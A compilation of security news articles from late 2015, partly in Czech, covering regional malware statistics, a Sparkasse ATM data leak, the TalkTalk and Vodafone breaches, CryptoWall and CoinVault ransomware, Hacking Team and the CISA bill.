1 Bangladesh 64.44
2 Vietnam 60.20
3 Nepal 60.19
4 Georgia 59.48
5 Somalia 59.33
6 Laos 58.33
7 Russia 57.79
8 Armenia 57.56
9 Afghanistan 56.42
10 Ethiopia 56.34
11 Rwanda 56.21
12 Syria 55.82
13 Mozambique 55.79
14 Yemen 55.17
15 Cambodia 55.12
16 Algeria 55.03
17 Iraq 55.01
18 Kazakhstan 54.83
19 Mongolia 54.65
20 Ukraine 54.19
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

The newcomers to this ranking are Mozambique in 13th position (55.8%), and Yemen in 14th (55.2%).

42.2% of computers globally faced at least one local threat during Q3 2015 #KLReport
The safest countries in terms of local infection risks were Sweden (21.4%), Denmark (19.8%) and Japan (18.0%).

IT threat evolution in Q3 2015

An average of 42.2% of computers globally faced at least one local threat during Q3 2015, which is 2.2% p.p. more than in Q2 2015.

Are we putting our finances at risk with our online shopping and banking?
Nearly everyone has faced a cyber criminal’s activity at one point or another. You have probably received a magical SMS that read something like: “You are the winner!!! Your Ferrari and $1M await you! Call XXXXXX right now!!!” Up until now, these well-known tricks have worked surprisingly well. Even if you’ve never taken the bait yourself, you probably know somebody who did.

Don't endanger your online transactions That person (or you) is not alone. Employees of huge corporations have also been taken by schemes from cyber criminals. For example, over the course of two years the Carbanak cybergang stole funds from dozens of financial institutions worldwide to the tune of roughly $1 Billion. Right now, there is a type of mobile malware targeting mobile banking.

To earn easy money, hackers, for example, make specific malware, which replaces legitimate banking interfaces with custom imagery and code. But before stealing your money, a malware needs to be installed on your device. So how does it find a loophole?

A test, recently conducted by Kaspersky Lab, shows that many users do not follow basic security rules when make online payments or log into an online banking system. 50% of the people surveyed do not check if they use the authentic website of their bank or payment system. They don’t pay attention at the https prefix, which indicates an encrypted connection; some of the surveyed have even selected a website with a misspelled address — an obvious sign of a fake phishing page.

It seems that a key logger will also find its victim: only each fifth of those surveyed prefer to use a virtual keyboard to protect their passwords from interception by malware. In the survey other users stated that they choose the “incognito” mode to protect a payment, or resort to an anonymizer, or even try to enter and wipe the data repeatedly in order “to confuse viruses.” Unfortunately, these actions do nothing to protect a user’s financial information.

Are we putting our #finances at risk with our #online shopping and #banking?
What’s more surprising it’s that 20% of the users do not think of protecting their banking accounts even offline. For example, in a restaurant they are ready to give their banking card to a nice waitress or a polite waiter and let them take it out of their site.

This is a bad idea. Please, remember: if fraudsters receive access to your card at least for a minute, they can make a full-fledged copy very quickly.

Banks cannot guarantee 100% protection simply because to large extend security depends on users behavior. Besides, not all payment systems care about cyber security that much. That’s why users, especially the less cyber savvy, should install specific solution to secure their online payments.

For example, one can have a look at the award-winning Safe Money technology for Windows and Mac OS X integrated in Kaspersky Internet Security – Multi-Device and Kaspersky Total Security – Multi-Device. Safe Money enables a multi-layered defense. It checks if the site is secure, ensures you’re not being tricked by a fake page and then opens the website in a special, protected mode.

Flaws in ATMs of a German Bank open the doors to cyber attacks

A security researcher at the Vulnerability Lab discovered that ATMs at the German savings bank Sparkasse can leak sensitive info during software updates.
The security researcher Benjamin Kunz-Mejri, CEO of the Vulnerability Lab, discovered that ATMs at the German savings bank Sparkasse can leak sensitive data during software updates.

The discovery of the anomaly was casual, Benjamin Kunz-Mejri was was using the ATM when it ejected his card and resulted “temporarily not available.” The expert tried to interact with the ATM and observed a Windows command prompt showing on ongoing update process, he took a video of the information displayed on the terminal.

The change of the status was caused by a software update, and the researcher used the term “timing attack” to describe his interaction with the ATM.

He was surprised that the ATM keyboard was not disabled, allowing an attacker to execute system commands via the command prompt. He also noticed that the card reader remained usable during the update process.

ATMs hack

Video recording has allowed the expert to analyze the information displayed on the screen, he noticed that many sensitive data was revealed, including the bank’s main system branch usernames, serial numbers, network and firewall configurations, device IDs, ATM settings, and two system passwords.

The ATM machines analyzed by the researcher are manufactured by Wincor Nixdorf, one of the most important company of the retail and banking industry. The flawed terminals are running Windows 7 and Windows XP operating systems. It is likely that other banks which are using the Wincor Nixdorf ATMs might be affected as well.

The experts warn about a large scale attack coordinated by a criminal ring in conjunction with a planned update, they described the following possible attack scenarios:

The attacker could use the information disclosed during the update process to run a man-in-the-middle (MitM) attack on the targeted bank’s local network. This attacker needs a physical access to bank network.
The attacker could push a bogus update to reconfigure the ATMs, also in this case he needs a physical access to bank network.
The Attacker could conduct fraudulent transactions by forcing the ATM crash and corrupt the logging or debugging mechanism.
The Vulnerability Lab reported the security issue to Sparkasse’s Security and Data Protection team in May, the flaw was confirmed after the vulnerability report was received by the internal Finance Security Center.

The Sparkasse bank has already pushed out updates that fix the issue to a limited number of ATMs in the city of Kassel. The purpose is to run further tests before issuing the update to all the ATMs used by the organization.

It is the first time that a German bank admits the security vulnerability in an ATM and reward the researchers.

Third suspect arrested in connection with the TalkTalk breach

A third suspect has been arrested by the British authorities in connection with the TalkTalk breach, he is a 20-year-old from Staffordshire.
While the investigation of the TalkTalk data breach is going on, a third man has been arrested in connection with the hack. The third unnamed suspect is a 20-year-old man from Staffordshire, he has been released on bail until March after he was arrested by law enforcement under the country’s Computer Misuse Act.

Investigators believe that he is a member of the group that hacked the telco firm TalkTalk stealing 1.2 million customer details (email addresses, names, and phone numbers, dates of birth) along with nearly 28,0000 partial credit and debit cards.

On October 26, the UK Metropolitan Police has announced the arrest of a 15-Year-Old in connection to the data breach. Law enforcement from the Police Service of Northern Ireland (PSNI) have identified the youngster and arrested him on suspicion of Computer Misuse Act offenses.


In a statement, the UK Metropolitan Police announced that officers from the Police Service of Northern Ireland, working with detectives from the MPCCU (MET Cyber Crime Unit) executed a search warrant at an address in County Antrim, Northern Ireland.

“At the address, a 15-year-old boy was arrested on suspicion of Computer Misuse Act offences. He has been taken into custody at a County Antrim police station where he will later be interviewed. A search of the address is ongoing and enquiries continue. This is a joint investigation by MPCCU detectives, the PSNI’s Cyber Crime Centre (CCC) and the National Crime Agency,” the statement added.

Some days later, on October 20, the UK Police have arrested a second individual as part of the investigation into the TalkTalk security breach, also in this case the suspect is a teenager. According to the Metropolitan Police, the second suspect is a 16-year-old boy from Feltham. The teen was arrested by the agents of the Cyber Crime Unit on suspicion of Computer Misuse Act offences and was later bailed.

The Register reported that victims of the cyber attack have the faculty to leave TalkTalk and terminate the contract without problem.

“Customers wanting to leave the popped telco will need to have had money stolen on or after 21 October as a result of the hack, and have contacted the fraud department.” states the The Register “TalkTalk says it is not accepting liability for other possible expenses customers may have to bear as a result of the breach.”

CISA Passes Senate, criticism about privacy and security


The CISA cyber security bill passes US Senate despite tech giants, privacy advocates, and civil liberties groups express their disappointment.
The US Senate voted overwhelmingly to pass a version of the Cybersecurity Information Sharing Act (CISA), a bill that has been debated for a long because it will authorize government pervasive monitoring of citizens.

Many politicians, tech giants, privacy advocates, and civil liberties groups are expressing their disappointment and consternation to the decision of the US Senate. The CISA bill passed with a final vote of 74 to 21, it requires companies to share information about potential threats with the government.

White House

The exponents of the senate that voted the bill consider it a necessary a measure against the numerous data breaches suffered by the US companies, including Sony Pictures, JP Morgan Chase, Anthem and the Office of Personnel Management.

The CISA is severely criticized because it will only advantage the Government Agencies to collect information about users, data that will be collected by the Department of Homeland Security and shared with the FBI and NSA.

The privacy advocates and part of the security industry believe that the CISA bill doesn’t address the problems that caused the long series of data breaches.

“The bill is fundamentally flawed due to its broad immunity clauses, vague definitions, and aggressive spying authorities. The bill now moves to a conference committee despite its inability to address problems that caused recent highly publicized computer data breaches, like unencrypted files, poor computer architecture, un-updated servers, and employees (or contractors) clicking malware links.” states the EFF disappointing as CISA Passes Senate.

The conference committee between the House of Representatives and the Senate will determine the bill’s final language, but experts are skeptical about the possibility to modify it to address the real cybersecurity problems in a correct way.

The Cybersecurity Information Sharing Act is considered the reincarnation in a new guise of the CISPA that passed in the United States House of Representatives on April 18, 2013,but has been blocked by the Senate.

While the CISPA was hampered by the Obama administration due to privacy concerns, the CISA has received the consensus of the President.

“The passage of CISA reflects the misunderstanding many lawmakers have about technology and security,” continues the EFF. “With security breaches like T-mobile, Target, and OPM becoming the norm, Congress knows it needs to do something about cybersecurity. It chose to do the wrong thing. EFF will continue to fight against the bill by urging the conference committee to incorporate pro-privacy language.”

CISA requests sharing of “cyber threat indicators,” but doesn’t address privacy issues.

The Sen. Ron Wyden (D-Ore) is one of the opponents of the CISA bill that he considers “flawed” and just “feel-good legislation.”He warned about the abuses that could result from the application of the CISA.

“The fight to secure Americans’ private, personal data has just begun,” said Wyden. “Today’s vote is simply an early, flawed step in what is sure to be a long debate over how the U.S. can best defend itself against cyber threats.”

Prior to the final vote, the principal IT companies, including Apple, Google and Microsoft, also expressed their privacy concerns over the CISA and its request to share sensitive customer data to the US Agencies.

“We don’t support the current CISA proposal. The trust of our customers means everything to us and we don’t believe security should come at the expense of their privacy.” said an Apple spokesperson before the final vote.

Report: German Bank ATMs vulnerable to Hackers

Avoiding Credit Card Fraud is simply easy as long as you use cash. But, what if you even get hacked while withdrawing cash from an ATM?
If you are living in Germany or traveling there, then think twice before using your payment cards in the ATMs.
Here’s why:
A Security researcher in Germany has managed to hack ATM and self-service terminal from Sparkasse Bank that allowed him to reveal the sensitive details from the payment card inserted into the machine.
Benjamin Kunz-Mejri, CEO of Germany-based security firm Vulnerability Lab, discovered a vulnerability while using a Sparkasse terminal that suddenly ejected his card, and changed status to "temporarily not available."
Meanwhile, the machine automatically started performing software update process in the background. However, Benjamin used a special keyboard combination to trick the ATM into another mode.
Benjamin’s trick forced ATM system to put update process console (cmd) in the foreground of the warning message.
"At that moment the researcher realized that there is a gap and used his iPhone to capture the bootChkN console output (Wincor Nixdorf) of the branch administrator," a blog post on Vulnerability-Lab stated.
After saving the data and reviewing the recording, Benjamin was able to reveal a lot of sensitive information, including the bank’s main branch office:
Serial numbers
Firewall settings
Network information
Computer name
Device IDs
ATM settings
Two system passwords
Other hardware related information
"Benjamin reported the critical issue to the Sparkasse Bank, which acknowledged the issue and has now started patching its ATMs and self-service terminals in a pilot program to prevent attacks." Sparkasse Bank said in a statement.
The ATM (Automated Teller Machine) analyzed by Benjamin is manufactured by Wincor Nixdorf, one of the most famous company in the retail and banking industry.
Therefore, the chances are high that other banks that are using the Wincor Nixdorf ATMs and self-service terminals are also affected, along with Sparkasse Bank.
Benjamin reported the critical issue to the Sparkasse Bank, which acknowledged the issue and has now started patching its ATMs and self-service terminals to prevent attacks.

Některé oběti ransomwaru už mohou svá data odemknout zdarma

2.11.2015 Viry
Napadl vás ransomware CoinVault a Bitcryptor? S největší pravděpodobností můžete svá data odemknout zdarma, protože k dispozici je 14 tisíc klíčů, které to umožňují -- získal je Kaspersky Lab a úřady v Holadsku.

Oba typy tohoto zákeřného malwru jsou podle všeho mrtvé. Jejich autoři byli zadrženi, což vedlo i k získání zhruba čtrnácti tisíc dešifrovacích klíčů, pomocí kterých teď můžou oběti svá data odemknout.

Hrozba CoinVaultu a Bitcryptoru se objevila loni v květnu, kdy ransomware infikoval velké množství počítačů, ve kterých zablokoval cenná data. Za jejich odblokování pak tvůrci škodlivého programu požadovali výkupné (ransom) v hodnotě stovek dolarů ve formě Bitcoinů.

Policie pachatele zadržela před několika týdny v nizozemském Amersfoortu, jednalo se o dva mladíky ve věku osmnáct a dvaadvacet let. Na jejich odhalení měla podíl i společnost Kaspersky Lab, jejíž pracovníci se dostali ke zhruba čtrnácti tisícům dešifrovacím klíčům, které teď pro použití napadenými uživateli přidali do své databáze noransom.kaspersky.com. Podle Kaspersky Lab je tak kauza CoinVaultu, respektive Bitcryptoru uzavřená.

Oběti útoků jiného ransomwaru však takové štěstí nemají. Americká FBI, která se touto problematikou zabývá, připustila, že je na většinu podobných útoků krátká. „Abych byl upřímný, často lidem doporučujeme, ať výkupné prostě zaplatí,“ uvedl jeden z agentů Joseph Bonavolonta.

Případů napadení ransomwarem přitom v posledních letech dramaticky přibývá. Počet uživatelů napadených nejrozšířenějším ransomwarem CryptoWall version 3 už se pohybuje v řádech stovek tisíců, přičemž skupina, která je za něj zodpovědná, si tak na výkupném přišla už na více než 325 milionů dolarů.

Pokročilé hrozby dokáže odhalit novinka firmy Symantec

2.11.2015 Zabezpečení
Řešení Advanced Threat Protection (ATP) podle výrobce umožňuje odhalit bezpečnostní hrozby, zjistit jejich závažnost a odstranit je napříč celou infrastrukturou.

Bezpečnostní řešení navržené speciálně proti pokročilým hrozbám oznámil Symantec. Ke sledování hrozeb prý postačuje jediná konzole, vykonání všech důležitých akcí vyžaduje pouze jediné kliknutí myši a na koncové body není nutné instalovat žádné nové agenty.

Řešení ATP koreluje podezřelé aktivity ze všech kontrolních bodů a řadí události podle jejich priority tak, aby bylo možné ihned zjistit, jaké z nich představují pro organizaci největší riziko.

Jakmile je kritická hrozba identifikovaná, lze snadno a rychle zablokovat její veškeré instance (kopie na dalších bodech, různé projevy v podnikové síti apod.).

K hlavním pokročilým hrozbám dnes patří ransomware (malware vydírající oběti), trojské koně umožňující útočníkovi vzdálený přístup, pokročilé přetrvávající hrozby (advanced persistent threats, APT) nebo útoky zero day (zneužití chyb softwaru v době, než jeho výrobce vydá opravu).

ATP obsahuje mj. technologii Cynic, což je nová technologie sandboxu, na cloudu založené simulační prostředí, které umožňuje stanovit závažnost jednotlivých hrozeb.

Součástí ATP je rovněž funkcionalita Synapse, tedy technologie fungující napříč jednotlivými kontrolními body, která analyzuje podezřelé aktivity na úrovni koncových bodů, sítí a e-mailu, přičemž opět pomáhá určit, co aktuálně představuje pro organizaci největší riziko.

Řešení bude k dispozici na konci roku 2015.

Hackers have accessed details of 1,827 Vodafone customers

According to Vodafone UK, criminals used the stolen data obtained from “an unknown source” to try to access customers’ accounts.
Personal details belonging to roughly 2,000 Vodafone customers have been compromised.

According to Vodafone, cyber criminals used the stolen data (emails and passwords) obtained from “an unknown source” to try to access customers’ accounts between Wednesday and Thursday.

“We can confirm that Vodafone UK was subject to an attempt to access some customers’ account details between midnight on Wednesday 28 October and midday on Thursday 29 October. At that point we initiated a comprehensive investigation to fully understand the facts so that we could give any affected customers the best possible advice. We informed the National Crime Agency (NCA), the ICO and Ofcom of the issue on the evening of Friday 30 October.” states the message issued by Vodafone UK.

vodafone notice accout data leaked

According to telecommunications company the criminals accessed 1,827 customers accounts, gaining their names, mobile phone number, bank short code and the last 4 digits of their bank account.

No credit or debit card numbers or details were obtained, but it is important to keep in mind that data accessed by criminals could be used for fraudulent activities.

Also in this case, the company is saying that its systems had not been breached, a circumstance similar to the security breach occurred recently to the British Gas company that caused the exposure of 2,200 records.

In response to the security breach, Vodafone has blocked the customers’ accounts involved in the incident and it is contacting affected customers to assist them with changing their account details.

Vodafone has already contacted the banks of affected customers to alert them to potential risks for the individual involved. Vodafone is now working with the National Crime Agency (NCA) and has already informed the ICO and Ofcom of the issue on the evening of Friday 30 October.

“The NCA can confirm that we have been contacted by Vodafone in relation to a compromise of customer data, and we are in dialogue with the company.” said an NCA spokeswoman said. “Anyone who thinks they have been subject to attempted or successful fraud, or other online crime, should report it to action fraud at www.actionfraud.police.uk.”

We will also be loading customers’ details into the Credit Industry Fraud Avoidance Service (CIFAS) database, which will ensure that bank or mobile operators will make additional checks to avoid fraud.

Victims of the security breach should:

Carefully monitor their banks and report any unusual activity. Users in England, Wales or Northern Ireland can contact the national fraud and internet crime reporting centre Action Fraud on 0300 123 2040 or www.actionfraud.police.uk. Scottish users can call Police Scotland.
Be aware of phishing emails.
Avoid giving out personal and financial data.

Criminals behind CryptoWall 3.0 Made $325 Million

Security researchers of the Cyber Threat Alliance have conducted an investigation into the cybercriminal operations leveraging CryptoWall 3.0 ransomware.
Brief Background

Ransomware, specifically crypto-ransomware, is a malware classification that encompasses Trojans that enumerate the file system of an infected host, in order to discover and compromise any and every document possible. Crypto-ransomware encrypts the contents of supported data files, rendering these files useless to their rightful owner.

This malware classification is quite self-explanatory; ransomware will often drop ransom notes in many areas within the affected file system, in varying formats and/or languages, that demand that the victim pays a ransom in order to recover their files. This ransom is usually paid in Bitcoin, with a (sometimes empty) promise of providing a decryption utility in order to recover all affected files, as a result of a successful, cleared ransom payment.

The CryptoWall family of ransomware first emerged in April 2014. Its first major revision came with the upgrade to CryptoWall 2.0, in October 2014. The most recent variant of the CryptoWall ransomware, CryptoWall 3.0, emerged in-the-wild beginning in January 2015.

cryptowall 3 microsoft

The sophistication of CryptoWall 3.0 has skyrocketed exponentially since its initial inception; CryptoWall 3.0 is the most advanced, and the most prevalent ransomware actively distributed in-the-wild today.

Statistical Information

Through a collaborative effort between several large, well-respected information security firms, several CryptoWall 3.0 campaigns were able to analyze with great granularity, revealing a wealth of information behind the threat actor(s) and their effectiveness. The information security firms that participated in this analysis includes: Intel Security, Fortinet, Symantec, Palo Alto Networks, and several other members of the Cyber Threat Alliance.

Monetary Damages: Approximately $325 Million
Analyzed Malware Samples: Over 4,000
Discovered C&C URLs: Approximately 839
Discovered 2nd-Tier C&C IP Addresses: Approximately 5
Total Infection Attempts: Over 400,000 Across 49 CryptoWall 3.0 Campaigns
Region Most Affected: North America

Across 49 analyzed CryptoWall 3.0 campaigns, over 400,000 infection attempts were logged. CryptoWall 3.0 is commonly delivered via phishing e-mail, but it is also quite commonly delivered as a payload of an exploit kit. Specifically, CryptoWall 3.0 seems to be the most commonly delivered payload by the Angler EK; the most active, sophisticated exploit kit found in-the-wild today. CryptoWall 3.0 ransom payments accounted for an estimated total of more than $60 million in revenue for an Angler EK group exposed by Cisco’s Talos Group earlier this year.


It just goes to show that the prevalence of ransomware in-the-wild is on the uprise, and the exponential growth of ransomware in sophistication and quantity of variants is not slowing down. Malware authors have been leveraging exploit kits to deliver their ransomware; a very effective infection method that is only becoming increasingly hard to defend against.

Free Ransomware Decryption Tool — CoinVault and Bitcryptor

Have you been infected with the insidious CoinVault or Bitcryptor ransomware?
If so, there is some potentially good news for you.
You may now recover your encrypted files for FREE! – Thanks to the efforts of Dutch police and antivirus maker Kaspersky Lab.
Security researchers from Kaspersky Lab and the Dutch Public Prosecution Service have obtained and published the last set of encryption keys from command-and-control (C&C) servers used by two related ransomware threats – CoinVault and Bitcryptor.
Security researchers first observed CoinVault ransomware attacks in May 2014. Since then, CoinVault has made more than 1,500 victims in more than 108 countries.
In April 2015, the Dutch police obtained 'Decryption keys' database from a seized command and control server of CoinVault.
Ransomware Decryption Tool
Those decryption keys were then used by Kaspersky Lab to set up a Ransomware Decryptor Service, which included a set of around 750 decryption keys recovered from CoinVault servers hosted in the Netherlands.
After that raid, the CoinVault's authors slowly updated their code, eventually releasing a second-generation CoinVault version that they named Bitcryptor.
However, last month, the Dutch authorities arrested two men in connection with CoinVault and Bitcryptor ransomware attacks, leading to the recovery of additional 14,031 decryption keys.
The keys have now been updated to the Kaspersky's Ransomware Decryptor Service and published on the noransom.kaspersky.com website.
Those victims that had their PCs infected by these ransomware programs and still have the encrypted data lying around can now download these keys to unlock their personal files.
How to Decrypt CoinVault and Bitcryptor Ransomware:
Step 1: Note down the Bitcoin wallet address mentioned by the malware.
Step 2: Get the encrypted file list from the ransomware interface.
Step 3: Then download an effective antivirus and remove CoinVault Ransomware.
Step 4: Open https://noransom.kaspersky.com and download the decryption tool released by Kaspersky Labs.
Step 5: Install additional libraries and Decrypt your files.
However, there's only one catch:
"If you get infected by this ransomware in the near future, you are out of luck."
Ransomware on Rise
Ransomware has emerged as one of the biggest Internet threats to the web users in recent years.
The authors of the notorious CryptoWall ransomware have raised more than $325 MILLION (£212 million) in this past year alone.
Typically, hackers primarily gain access to a user's computer using ransomware malware that heavily encrypts data files with a strong cryptographic algorithm, and then demand a ransom money (to be paid in Bitcoin), which ranges from $200 to $10,000.
How to Prevent Yourself Against Ransomware Attacks?
Just few days back, the Federal Bureau of Investigation (FBI) advised ransomware victims to just pay off the criminals in order to see their valuable data again.
However, in my opinion, the best defense against these threats is to ensure that all your important files are regularly backed up to a separate drive or storage that are only temporarily connected and can not be reached by the attackers.
A few more things you should keep in mind to prevent your Computer from getting infected with ransomware and other malware threats are:
Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Avoid Opening Emails and attachments from unknown sources.

Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies

Hacking Team, the infamous Italy-based spyware company that had more than 400 GB of its confidential information stolen earlier this year, has resumed its operations and started pitching new hacking tools to help US law enforcement gets around their encryption issues.
Yes, Hacking Team is back with a new set of Encryption Cracking Tools for government agencies as well as other customers to break encrypted communications.
The announcement came in an email pitch sent to existing and potential new customers on October 19 when Hacking Team CEO David Vincenzetti confirmed that Hacking Team is now "finalizing [its] brand new and totally unprecedented cyber investigation solutions."
The e-mail is not made public, but Motherboard has been able to obtain a copy of it that states:
"Most [government agencies] in the United States and abroad will become 'blind,' they will 'go dark,' they will simply be unable to fight vicious phenomena such as terrorism," wrote Vincenzetti. "Only the private companies can help here; we are one of them."
"It is crystal clear that the present American administration does not have the stomach to oppose the American IT conglomerates and to approve unpopularly, yet totally necessary, regulations," He added.
Game Changers
The brand new cyber investigation solutions here, of which Vincenzetti is talking about, will be "Game Changers."
The announcement came roughly 4 months after a mysterious hacker or group of hackers hacked into Hacking Team's servers, leaking more than 400 gigabytes of internal data, including:
Internal emails
Hacking tools
Zero-day exploits
Surveillance tools
Source code for Spyware suite, called Remote Control System (RCS)
A spreadsheet listing every government client with date of purchase and amount paid
Remote Control System Version 10 (RCS 10)
Since then, Hacking Team has reportedly been working on launching a new revamped 10th edition of its proprietary Remote Control System, RCS 10.
Hacking Team is known for its Remote Control System (RCS) spyware, also known as Galileo, which is loaded with a number of zero-day exploits that have the ability to monitor the computers of its targets remotely.
However, it's still unclear when the company will actually release RCS 10. Also, it is all set to be seen as to which law enforcement agencies will take the Hacking Team offer, given its recent security breach.

Anonymous will reveal names of about 1,000 KKK members

“Ku Klux Klan, We never stopped watching you,” “We know who you are.” Anonymous plans to reveal the identities of up to 1,000 Ku Klux Klan members.
The popular Anonymous collective has declared war to the white supremacy group Ku Klux Klan (KKK), the hacktivist has posted a video message on YouTube and a message on Twitter to announce that it is holding a list of names of the Klan members.

Anonymous confirmed that they hacked a Twitter account and that obtained through it about 1000 klan member identities.

We’ve gained access to yet another KKK Twitter account. Using the info obtained, we will be revealing about 1000 klan member identities.
— Operation KKK (@Operation_KKK) 22 Ottobre 2015

“All will be revealed next month around the one year anniversary of #OpKKK,” it tweeted, under the handle @Operation_KKK. The Anonymous campaign dubbed #OpKKK has begun in November 2014 in response to the menaces that KKK members made against peaceful protesters in Ferguson. Ferguson (Missuri) has become the center of racial tensions after the officer Darren Wilson killed the 18-year-old black boy, Michael Brown, in August 2014.

“You are more than extremists. You are more than a hate group,” states the Anonymous’s message.” “You operate much more like terrorists and you should be recognized as such. You are terrorists that hide your identities beneath sheets and infiltrate society on every level.” “The privacy of the Ku Klux Klan no longer exists in cyberspace. You’ve had blood on your hands for nearly 200 years.” Anonymous also announced the imminent disclosure of the identities of 1000 members of the KKK.

“We will release, to the global public, the identities of up to 1,000 Klan members, Ghoul Squad affiliates and other close associates of various factions of the Ku Klux Klan across the United States.”
The Ghoul Squad is considered an organization belonging to the KKK.

We’ve gained access to yet another KKK Twitter account. Using the info obtained, we will be revealing about 1000 klan member identities. — Operation KKK (@Operation_KKK) 22 Ottobre 2015
Stay Tuned …. this is just the beginning.

How CoinVault or Bitcryptor victims could try to recover their files

Victims of CoinVault ransomware can now rely on a new set of encryption keys added to the free CoinVault Ransomware Decryptor tool to recover their files.
Every day, dozens of users ask me how to decrypt their data locked by various ransomware such as CoinVault or Bitcryptor?

Now I have a good news for them, it is possible to use a free tool to recover the encrypted files.

The tool was designed by the experts of the Kaspersky Lab in collaboration with the Dutch police, the experts have used a set of encryption keys extracted from command-and-control (C&C) servers used by two groups that were using CoinVault and Bitcryptor.

In May 2014, the investigators detected numerous attacks based on the CoinVault ransomware that infected more than 1,500 victims in more than 108 countries.

In April 2015, the Dutch Public Prosecution Service extracted a set of CoinVault Decryption keys from a database present on a seized command and control server.

In April 2015, the expert from Kaspersky Lab announced the development of the tool called “CoinVault Ransomware Decryptor”, the researcher teamed up with The National High Tech Crime Unit (NHTCU) of the Dutch Police.
CoinVault malware

The tool included a set of around 750 decryption keys recovered from CoinVault servers hosted in the Netherlands.

In response to the action of the law enforcement, the authors of CoinVault updated their code and released a new version dubbed Bitcryptor.

Now the law enforcement could rely on additional 14,031 decryption keys obtained last month by the Dutch authorities following the arrest of two men in connection with CoinVault and Bitcryptor ransomware attacks.

The keys have been included in the Kaspersky’s Ransomware Decryptor Service which is available on the noransom.kaspersky.com website.
If you are a victim of CoinVault and Bitcryptor ransomware attacks you can try to download these keys to unlock the encrypted files.
To decrypt the file use the following procedure:
Step 1: If you are infected with CoinVault, just note down the Bitcoin wallet address mentioned by the malware on the screen.
Step 2: Get the encrypted file list from ransomware interface.
Step 3: Download an effective antivirus and remove CoinVault Ransomware first.
Step 4: Open https://noransom.kaspersky.com and download the decryption tool released by Kaspersky Labs.
Step 5: Install additional libraries and Decrypt your files.
In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up-to-date.
Avoid visits suspicious websites.
Regularly backup your important files to a separate drive or storage that are only temporarily connected.
Be on high alert for pop-ups, spam, and unexpected email attachments.

Hacking discipline, EOL of computer science in the cyber domain

The hacking world will change. Instead of hacking based on computer programming as today, the hacking will be based on chemistry, biology, and physics.
In the medium term future, the hacking world will change. Instead of hacking based on computer programming as today, the hacking will be based on chemistry, biology and physics. This article will explain this claim. For the discussion, I will split the hacking scene to two main scenarios – Hacking to autonomic machines and hacking to the human body.

In “autonomous machines”, I refer to self-healing machines that can find and fix vulnerabilities in the code by them self. When this kind of machines will be developed, they will turn the hackers useless. In this future reality, only machines will hack each other. I will come back to this future later.


In the other scenario, humans control the machines, and hackers are manipulating them to hack the machines. In a deeper vision, humans are building the machines, programming them, using and fixing them. All the life-cycle of the machines is controlled by humans. Therefore, by hacking the human behavior, one can control the machine.

To make it clearer, when one hacks a machine, he exploits the code that another human has written for the machine or the behavior of human that uses the machine. Zero-day vulnerabilities, backdoor’s or logic bombs, are all failures of humans. When the autonomous machines are developed, all those failures will be reduced to a minimum or even disappear with time.

In “minimize failures” reality, it will become much harder for hackers to hack the machines, forcing them to go mostly after humans. One can imagine the machinery infrastructure as the transport and storage layer of human knowledge. And if that layer becomes unhackable, we are talking about hacking the human brain or body to get the knowledge or behavior we want to get.

Going back to the second scenario, hacking will turn to biological computing systems [as the human body] rather than machinery based systems as today. It will change the hacking profession. Computer science will be replaced with chemistry, biology and physics.

While it seems like science fiction to some, I believe it’s the future. Any country that will want to maintain a competitive advantage with others in the futuristic cyber domain, should educate the young generation in those professions. It should be noticed that educating someone in chemistry, biology or physics [MA\Phd] takes a longer period than to do it for computer science \ programming.

This conclusion is applicable also to the business world. The change won’t be linear. When autonomic machines will enter the market, all the existing cyber solutions will be obsolete. No human will be able to write a code that protects against a cyber attack by autonomous machine. It will be companies that developed offense \ defense solutions for the human body that will survive.

To summarize, the cyber domain is a dynamic technology field based today on machines. And because of that, the machines are becoming more efficient in their way to an autonomous degree.

It’s not “if,” but a “When” question. It will be who understand it and embrace it that will lead the future cyber domain. Those who will keep “Hold a bull’s horn” will become irrelevant.

About the Author Ami Rojkes Dombe

Ami is An Israeli-based writer, tech corresponded of the Israel Defense magazine. Covers the Israeli cyber industry, defense industries and the ICT scene. Passions include futuristic technologies, science and geopolitical aspect of technology. MA in political science with thesis in Cyber deterrence.

The surveillance firm Hacking Team is back stronger than before

Motherboard has obtained a non-public email sent by the Hacking Team CEO to its customers that announce a new generation of hacking tools.
Hacking Team is the popular surveillance company that suffered a serious data breach this year. More than 400 GB of its sensitive data were exfiltrated from the Italian company, including internal emails, zero-day exploits, surveillance tools, source code for the Remote Control System (RCS) spyware and a spreadsheet listing government clients.

The company has resumed its operations and as expected by the experts started is working with a new set of tools for its arsenal.

Among the numerous clients of the Hacking Team, there are several US law enforcement and intelligence agencies.

Hacking Team RCS údajné klienty

Hacking Team RCS alleged clients
News of the day is that the company is offering to its clients Encryption Cracking Tools to circumvent the Internet encryption.

The Encryption Cracking Tools allow the company’s customers to break encrypted communications.

The news was reported by Motherboard that obtained a copy of a non-public email sent by the CEO David Vincenzetti to a mailing list made of potential and current customers on October 19.
“Most [law enforcement agencies] in the US and abroad will become ‘blind,’ they will ‘go dark:’ they will be simply be [sic] unable to fight vicious phenomena such as terrorism,” states the email sent by the Hacking Team’s CEO David Vincenzetti. “Only the private companies can help here, we are one of them.” “It is crystal clear that the present American administration does not have the stomach to oppose the American IT conglomerates and to approve unpopularly, yet totally necessary, regulations,”
Following the data breach, the Hacking Team went into “full on emergency mode,” asking its customers to shut off their surveillance systems.
In response to the hack, the firm has been working on new version of its surveillance software and hacking tools, including a new version of the RCS 10.
Vincenzetti announced in the email message a totally new cyber arsenal, he defined its new tools as game changers,

[Hacking Team is] “finalizing brand new and totally unprecedented cyber investigation solutions, game changers, to say the least.”
Motherboard mentions a totally a new RCS version, RCS 10, a powerful tool that is able to load a number zero-day exploits designed by the experts of the company.

How to steal Jaguar XFR cars in 60 seconds by hacking them

Hackers are able to steal Jaguar XFR cars by exploiting a hacking device that sends out a fake signal emulating a wireless key.
According to the CCTV footage, a Jaguar XFR parked in a parking lot in Auckland (New Zealand) was stolen with this technique. The video shows the thief that walks towards the car, opens the door and jump in.

According to the law enforcement, hacking devices like the one used in the theft are offered for sale on the Internet and could be easily configured to target specific car models using wireless systems.

In 2014, nearly 6000 cars have been stolen in London with this technique.

